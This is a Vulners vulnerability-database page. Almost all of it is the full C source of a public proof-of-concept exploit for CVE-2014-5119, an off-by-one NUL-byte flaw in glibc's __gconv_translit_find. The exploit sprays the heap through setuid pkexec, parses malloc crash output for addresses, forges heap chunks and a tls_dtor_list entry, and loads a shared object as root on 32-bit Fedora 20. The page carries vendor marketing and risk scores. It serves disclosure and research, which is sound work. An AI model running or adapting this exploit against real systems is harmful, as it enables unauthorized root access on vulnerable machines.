Vulners
Lucene search
glibc Off-by-One NUL Byte gconv_translit_find Exploit
10
//
// Full Exploit: http://www.exploit-db.com/sploits/CVE-2014-5119.tar.gz
//
//
// ---------------------------------------------------
// CVE-2014-5119 glibc __gconv_translit_find() exploit
// ------------------------ taviso & scarybeasts -----
//
// Tavis Ormandy <[email protected]>
// Chris Evans <[email protected]>
//
// Monday 25th August, 2014
//
#define _GNU_SOURCE
#include <err.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <dlfcn.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <assert.h>
#include <stdarg.h>
#include <stddef.h>
#include <signal.h>
#include <string.h>
#include <termios.h>
#include <stdbool.h>
#include <sys/user.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#include <sys/resource.h>
// Minimal environment to trigger corruption in __gconv_translit_find().
static char * const kCorruptCharsetEnviron[] = {
"CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
NULL,
};
static const struct rlimit kRlimMax = {
.rlim_cur = RLIM_INFINITY,
.rlim_max = RLIM_INFINITY,
};
static const struct rlimit kRlimMin = {
.rlim_cur = 1,
.rlim_max = 1,
};
// A malloc chunk header.
typedef struct {
size_t prev_size;
size_t size;
uintptr_t fd;
uintptr_t bk;
uintptr_t fd_nextsize;
uintptr_t bk_nextsize;
} mchunk_t;
// A tls_dtor_list node.
typedef struct {
uintptr_t func;
uintptr_t obj;
uintptr_t map;
uintptr_t next;
} dlist_t;
// The known_trans structure glibc uses for transliteration modules.
typedef struct {
uint8_t info[32];
char *fname;
void *handle;
int open_count;
} known_t;
enum {
LOG_DEBUG,
LOG_WARN,
LOG_ERROR,
LOG_FATAL,
};
// Round up an integer to the next PAGE_SIZE boundary.
static inline uintptr_t next_page_size(uintptr_t size)
{
return (size + PAGE_SIZE - 1) & PAGE_MASK;
}
// Allocate a buffer of specified length, starting with s, containing c, terminated with t.
static void * alloc_repeated_string(size_t length, int s, int c, int t)
{
return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);
}
static void logmessage(int level, const char * format, ...)
{
va_list ap;
switch (level) {
case LOG_DEBUG: fprintf(stderr, "[*] "); break;
case LOG_WARN: fprintf(stderr, "[*] "); break;
case LOG_ERROR: fprintf(stderr, "[!] "); break;
}
va_start(ap, format);
vfprintf(stderr, format, ap);
va_end(ap);
fputc('\n', stderr);
if (level == LOG_ERROR) {
_exit(EXIT_FAILURE);
}
}
// Parse a libc malloc assertion message to extract useful pointers.
//
// Note, this isn't to defeat ASLR, it just makes it more portable across
// different system configurations. ASLR is already nullified using rlimits,
// although technically even that isn't necessary.
static int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)
{
FILE *pty;
char *mallocerror;
char *memorymap;
char *line;
char *prev;
char message[1 << 14];
char *anon = NULL;
char r, w, x, s;
ssize_t count;
int status;
uintptr_t mapstart;
uintptr_t mapend;
// Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot
// be changed in setuid programs, so this wrapper catches tty output.
while (true) {
// Reset any previous output.
memset(message, 0, sizeof message);
logmessage(LOG_DEBUG, "Attempting to invoke pseudo-pty helper (this will take a few seconds)...");
if ((pty = popen("./pty", "r")) == NULL) {
logmessage(LOG_ERROR, "failed to execute pseudo-pty helper utility, cannot continue");
}
if ((count = fread(message, 1, sizeof message, pty)) <= 0) {
logmessage(LOG_ERROR, "failed to read output from pseudo-pty helper, %d (%m)", count, message);
}
logmessage(LOG_DEBUG, "Read %u bytes of output from pseudo-pty helper, parsing...", count);
pclose(pty);
mallocerror = strstr(message, "corrupted double-linked list");
memorymap = strstr(message, "======= Memory map: ========");
// Unfortunately this isn't reliable, keep trying until it works.
if (mallocerror == NULL || memorymap == NULL) {
logmessage(LOG_WARN, "expected output missing (this is normal), trying again...");
continue;
}
logmessage(LOG_DEBUG, "pseudo-pty helper succeeded");
break;
}
*baseaddr = 0;
*chunkptr = 0;
*bssaddr = 0;
*libcaddr = 0;
logmessage(LOG_DEBUG, "attempting to parse libc fatal error message...");
// Verify this is a message we understand.
if (!mallocerror || !memorymap) {
logmessage(LOG_ERROR, "unable to locate required error messages in crash dump");
}
// First, find the chunk pointer that malloc doesn't like
if (sscanf(mallocerror, "corrupted double-linked list: %p ***", chunkptr) != 1) {
logmessage(LOG_ERROR, "having trouble parsing this error message: %.20s", mallocerror);
};
logmessage(LOG_DEBUG, "discovered chunk pointer from `%.20s...`, => %p", mallocerror, *chunkptr);
logmessage(LOG_DEBUG, "attempting to parse the libc maps dump...");
// Second, parse maps.
for (prev = line = memorymap; line = strtok(line, "\n"); prev = line, line = NULL) {
char filename[32];
// Reset filename.
memset(filename, 0, sizeof filename);
// Just ignore the banner printed by glibc.
if (strcmp(line, "======= Memory map: ========") == 0) {
continue;
}
if (sscanf(line, "%08x-%08x %c%c%c%c %*8x %*s %*u %31s", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {
// Record the last seen anonymous map, in case the kernel didn't tag the heap.
if (strlen(filename) == 0) {
anon = line;
}
// If the kernel did tag the heap, then everything is easy.
if (strcmp(filename, "[heap]") == 0) {
logmessage(LOG_DEBUG, "successfully located first morecore chunk w/tag @%p", mapstart);
*baseaddr = mapstart;
}
// If it didn't tag the heap, then we need the anonymous chunk before the stack.
if (strcmp(filename, "[stack]") == 0 && !*baseaddr) {
logmessage(LOG_WARN, "no [heap] tag was found, using heuristic...");
if (sscanf(anon, "%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s", baseaddr, filename) < 1) {
logmessage(LOG_ERROR, "expected to find heap location in line `%s`, but failed", anon);
}
logmessage(LOG_DEBUG, "located first morecore chunk w/o tag@%p", *baseaddr);
}
if (strcmp(filename, "/usr/lib/libc-2.18.so") == 0 && x == 'x') {
logmessage(LOG_DEBUG, "found libc.so mapped @%p", mapstart);
*libcaddr = mapstart;
}
// Try to find libc bss.
if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {
logmessage(LOG_DEBUG, "expecting libc.so bss to begin at %p", mapstart);
*bssaddr = mapstart;
}
continue;
}
logmessage(LOG_ERROR, "unable to parse maps line `%s`, quiting", line);
break;
}
return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;
}
static const size_t heap_chunk_start = 0x506c8008;
static const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);
static const size_t nstrings = 15840000;
// The offset into libc-2.18.so BSS of tls_dtor_list.
static const uintptr_t kTlsDtorListOffset = 0x12d4;
// The DSO we want to load as euid 0.
static const char kExploitDso[] = "./exploit.so";
int main(int argc, const char* argv[])
{
uintptr_t baseaddr;
uintptr_t chunkptr;
uintptr_t bssaddr;
uintptr_t libcaddr;
uint8_t *param;
char **args;
dlist_t *chain;
struct utsname ubuf;
// Look up host type.
if (uname(&ubuf) != 0) {
logmessage(LOG_ERROR, "failed to query kernel information");
}
logmessage(LOG_DEBUG, "---------------------------------------------------");
logmessage(LOG_DEBUG, "CVE-2014-5119 glibc __gconv_translit_find() exploit");
logmessage(LOG_DEBUG, "------------------------ taviso & scarybeasts -----");
// Print some warning that this isn't going to work on Ubuntu.
if (access("/etc/fedora-release", F_OK) != 0 || strcmp(ubuf.machine, "i686") != 0)
logmessage(LOG_WARN, "This proof of concept is designed for 32 bit Fedora 20");
// Extract some useful pointers from glibc error output.
if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {
logmessage(LOG_ERROR, "unable to parse libc fatal error message, please try again.");
}
logmessage(LOG_DEBUG, "allocating space for argument structure...");
// This number of "-u" arguments is used to spray the heap.
// Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.
// The value is just large enough to usuaully crash the heap into the stack without going OOM.
if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {
logmessage(LOG_ERROR, "allocating argument structure failed");
}
logmessage(LOG_DEBUG, "creating command string...");
args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);
args[nstrings * 2 + 2] = NULL;
logmessage(LOG_DEBUG, "creating a tls_dtor_list node...");
// The length 59 is chosen to cause a 64byte allocation by stdrup. That is
// a 60 byte nul-terminated string, followed by 4 bytes of metadata.
param = alloc_repeated_string(59, 'A', 'A', 0);
chain = (void *) param;
logmessage(LOG_DEBUG, "open_translit() symbol will be at %p", libcaddr + _OPEN_TRANSLIT_OFF);
logmessage(LOG_DEBUG, "offsetof(struct known_trans, fname) => %u", offsetof(known_t, fname));
chain->func = libcaddr + _OPEN_TRANSLIT_OFF;
chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);
chain->map = baseaddr + 8 + sizeof(*chain);
chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);
logmessage(LOG_DEBUG, "appending `%s` to list node", kExploitDso);
memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);
logmessage(LOG_DEBUG, "building parameter list...");
for (int i = 0; i < nstrings; ++i) {
args[i*2 + 1] = "-u";
args[i*2 + 2] = (void *) chain;
}
// Verify we didn't sneak in a NUL.
assert(memchr(chain, 0, sizeof(chain)) == NULL);
logmessage(LOG_DEBUG, "anticipating tls_dtor_list to be at %p", bssaddr + kTlsDtorListOffset);
// Spam all of possible chunks (some are unfortunately missed).
for (int i = 0; true; i++) {
uintptr_t chunksize = 64;
uintptr_t chunkaddr = baseaddr + i * chunksize;
uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;
uintptr_t chunkpageoffset = PAGE_MASK;
uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);
uint8_t *param = NULL;
mchunk_t chunk = {
.prev_size = 0xCCCCCCCC,
.size = 0xDDDDDDDD,
.fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,
.bk_nextsize = baseaddr + 8,
};
// Compensate for heap metadata every 1MB of allocations.
chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);
if (chunkaddr < heap_chunk_start)
continue;
if (chunkaddr > heap_chunk_end)
break;
chunkpageoffset = chunkaddr & ~PAGE_MASK;
if (chunkpageoffset > targetpageoffset) {
continue;
}
if (targetpageoffset - chunkpageoffset > chunksize) {
continue;
}
// Looks like this will fit, compensate the pointers for alignment.
chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);
if (memchr(&chunk, 0, sizeof chunk)) {
logmessage(LOG_WARN, "parameter %u would contain a nul, skipping", i);
continue;
}
args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);
memcpy(param + (targetpageoffset - chunkpageoffset),
&chunk,
sizeof chunk);
}
setrlimit(RLIMIT_STACK, &kRlimMax);
setrlimit(RLIMIT_DATA, &kRlimMin);
args[0] = "pkexec";
logmessage(LOG_DEBUG, "execvpe(%s...)...", args[0]);
execvpe("pkexec", args, kCorruptCharsetEnviron);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2014 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.21511